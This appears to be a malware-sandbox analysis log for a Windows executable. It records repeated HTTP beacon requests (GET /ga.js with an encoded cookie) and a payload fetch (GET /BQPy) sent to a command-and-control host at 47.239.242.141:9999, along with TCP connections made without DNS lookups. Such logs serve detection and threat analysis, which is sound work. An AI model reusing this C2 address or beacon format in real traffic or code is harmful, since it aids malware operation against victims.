Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141
Source: unknown	TCP traffic detected without corresponding DNS query: 47.239.242.141

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D77AF5 GetTickCount,_malloc,htonl,recvfrom,WSAGetLastError,htonl,ioctlsocket,

0_2_03D77AF5

Source: global traffic	HTTP traffic detected: GET /BQPy HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
